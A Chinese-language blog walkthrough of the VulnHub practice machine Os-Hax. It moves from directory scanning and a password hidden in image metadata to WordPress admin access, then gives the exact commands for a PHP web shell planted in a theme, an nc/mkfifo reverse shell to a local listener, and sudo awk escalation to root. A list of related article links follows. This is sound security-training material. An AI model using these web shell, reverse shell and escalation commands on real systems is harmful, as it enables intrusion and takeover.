Difficulty : Intermediate
Flag : boot-root
Learing : exploit | web application Security | Privilege Escalation
Contact .. https://www.linkedin.com/in/rahulgehlaut/
This works better in VirtualBox than VMware
 
下载地址
https://www.vulnhub.com/entry/hacknos-os-hax,389/
不知道如何进行安装的,可以查看我的第一篇文章,里面有详细的介绍。
首先看ip然后扫描这个ip段,看靶机的IP地址是多少

发现靶机ip,使用nmap进行扫描

使用firefox 192.168.0.9进行访问。

可以查看页面的源代码,看看有没有什么有用信息。

使用目录扫描器gobuster扫描,发现一个wordpress目录。命令:gobuster dir -u http://192.168.0.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

访问成功,发现有一些标签并没有进行加载。需要让css样式进行加载

做一个hosts,把IP加入到localhost

访问成功,加载了样式。

发现这里有个用户,可以试着后台登录。

找到后台,尝试弱密码登录,无法登录。

看一下忘记密码,能不能获得验证的邮箱或者地址。

也无法获得邮箱和地址。

到这一步,再回到刚才的目录扫描,看看其他的目录文件。发现有一个img试着访问。

发现有一个图片是flag开头的,打开查看。

先把图片保存下来。

在本地使用工具查看里面的内容,发现一个好像passwd的密码,保存在文件夹中。

在使用其他工具查看一下信息。exiftool没有安装,使用apt-get install exiftool进行安装。

发现make当中同样存在passwd。

思考这个pass会是一个什么,重新使用账号进行登录,发现还是提示密码不对。

试试看会不会是目录文件,发现访问成功。有一个hostIP文件和一个flag文件。

发现是一个加密文件,把加密文件用百度进行查找

进行解密,获得账号密码,web:Hacker@4514 然后保存到文件夹中

使用账号密码进行登录,成功登录到了后台。

查看用户,发现我们是超级管理员,那就可以编写一个主题,拿webshell。

来到主题编写header这个主题,加入一句话木马。

更新一下,system($_REQUEST['knife']);

更新之后,来到主页,输入http://localhost/wordpress/?knife=id,成功使用

打开burp,放到reqeater,使用post传参,来使用反弹shell

监听本地的9001端口。nc -lvnp 9001

ctrl+u进行编码。使用反弹shell命令:rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.0.8+9001+>/tmp/f

反弹成功,做一个bashshell。

命令:python -c 'import pty;pty.spawn("/bin/bash")'

在文件当中,发现了一个config文件,进行查看,可以看见数据库账号和密码。

命令:cat /etc/passwd 查看密码文件

切换用户为web,之前获得的账号密码进行登录。

查看当前用户的权限,awk是可以调用系统函数的。可以进行执行root的命令

命令:sudo awk '{ system("/bin/bash")}' ,获得root权限。

进入root目录,查看文件,获得flag。

查看cat /etc/sudoers文件,发现web是nopasswd,可以使用awk。

这个版本也存在一个提权漏洞,也是另一种方法。uname -a

总结:

1.当发现后台进行爆破无法成功时,需要想一想目录的问题,会不会提示信息是在目录当中。

2.发现一些编码格式时,可以百度进行查看解密。

3.基本上拿到webshell之后所思考的提权都是有很多种的,根据情况不同,需要有不同的方法。

 
 
 

vulnhub靶机练习-Os-Hax,详细使用的更多相关文章

  1. vulnhub靶机-Me and My Girlfriend: 1

    vulnhub靶机实战 1.靶机地址:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 2.先看描述(要求) 通过这个我们可以知道我们 ...

  2. vulnhub靶机Os-hackNos-1

    vulnhub靶机Os-hackNos-1 信息搜集 nmap -sP 192.168.114.0/24 找到开放机器192.168.114.140这台机器,再对这台靶机进行端口扫描. 这里对他的端口 ...

  3. vulnhub靶机练习-Os-hackNos-1,超详细使用

    第一次写自己总结的文章,之后也会有更新,目前还在初学阶段. 首先介绍一下靶机,靶机是 vulnhub Os-hackNos-1 简介: 难度容易到中, flag 两个 一个是普通用户的user.txt ...

  4. Vulnhub 靶机 pwnlab_init 渗透——详细教程

    1. 下载 pwnlab_ini 靶机的 .ova 文件并导入 VMware: pwnlab下载地址:PwnLab: init ~ VulnHub 导入VMware时遇到VMware上虚机太多,无法确 ...

  5. vulnhub靶机之DC6实战(wordpress+nmap提权)

    0x00环境 dc6靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip dc6以nat模式在vmware上打开 kali2019以nat模式启动,ip地址为 ...

  6. vulnhub靶机djinn:1渗透笔记

    djinn:1渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/djinn-1,397/ 信息收集 首先我们嘚确保一点,kali机和靶机处于同一网段,查看kali i ...

  7. 对vulnhub靶机lampiao的getshell到脏牛提权获取flag

    前言: vulnhub里面的一个靶场,涉及到drupal7 cms远程代码执行漏洞(CVE-2018-7600)和脏牛提权. 靶机下载地址:https://mega.nz/#!aG4AAaDB!CBL ...

  8. PJzhang:vulnhub靶机sunset系列SUNSET:TWILIGHT

    猫宁~~~ 地址:https://www.vulnhub.com/entry/sunset-twilight,512/ 关注工具和思路. nmap 192.168.43.0/24靶机IP192.168 ...

  9. 脚本小子学习--vulnhub靶机DC8

    @ 目录 前言 一.环境搭建 二.目标和思路 三.实际操作 1.信息收集 2.getshell 总结 前言 通过一些靶机实战练习,学习使用现有的工具来成为脚本小子. 一.环境搭建 靶机:Linux虚拟 ...

随机推荐

  1. redis数据类型:String

    redis数据类型:String 花开堪折直需折,莫待无花空折枝 实际应用中有多种多样的场景,比如: 秒杀 新闻热点 在线人数 session.token管理 各个场景需要的数据类型各不相同:常见的数 ...

  2. nacos统一配置中心源码解析

    配置文件想必大家都很熟悉,无论什么架构 都离不开配置,虽然spring boot已经大大简化了配置,但如果服务很多 环境也好几个,管理配置起来还是很麻烦,并且每次改完配置都需要重启服务,nacos c ...

  3. 真的,kafka 入门看这一篇准没错!

    什么是 Kafka Kafka 是一个分布式流式平台,它有三个关键能力 订阅发布记录流,它类似于企业中的消息队列 或 企业消息传递系统 以容错的方式存储记录流 实时记录流 Kafka 的应用 作为消息 ...

  4. linux find命令用法大全

    本文档格式如下,命令说明在命令的上一行,尝试使用 Ctrl+f 组合键快速在页面内搜索. 命令说明 命令     参数起始目录:查找文件的起始目录.实例# 当前目录搜索所有文件,文件内容 包含 &qu ...

  5. 实现一个简单的 Linux Shell(C++)

    Implement a simple command interpreter in Linux. The interpreter should: support both internal and e ...

  6. CAN总线采样点测试

    采样点是什么? 采样点是接受节点判断信号逻辑的位置,CAN通讯属于异步通讯.需要通过不断的重新同步才能保证收发节点的采样准确. 若采样点太靠前,则因为线缆原因,DUT外发报文尚未稳定,容易发生采样错误 ...

  7. 输入5V,输出5V限流芯片,4A限流,短路保护

    USB限流芯片,5V输入,输出5V电压,限流值可以通过外围电阻进行调节,PWCHIP产品中可在限流范围0.4A-4.8A,并具有过压关闭保护功能. 过压关闭保护: 如芯片:PW1555,USB我们一半 ...

  8. web项目启动链接mysql巨慢

    说明:项目部署到测试服务器上,mysql部署在另一台服务器上,项目第一次启动之后登陆后台很慢,大概30s左右,经查发现第一次访问数据库的时候会通过DNS解析客户端机器域名,mysql还有DNS反向解析 ...

  9. uni-app开发经验分享一: 多页面传值的三种解决方法

    开发了一年的uni-app,在这里总结一些uni-app开发中的问题,提供几个解决方法,分享给大家: 问题描述:一个主页面,需要联通一到两个子页面,子页面传值到主页面,主页面更新 问题难点: 首先我们 ...

  10. GlusterFS分布式存储系统复制集更换故障Brick操作记录

    场景: GlusterFS 3节点的复制集,由于磁盘故障,其中一个复制集需要重装系统,所以需要重装glusterfs并将该节点加入glusterfs集群 一. 安装GlusterFS 首先在重装系统节 ...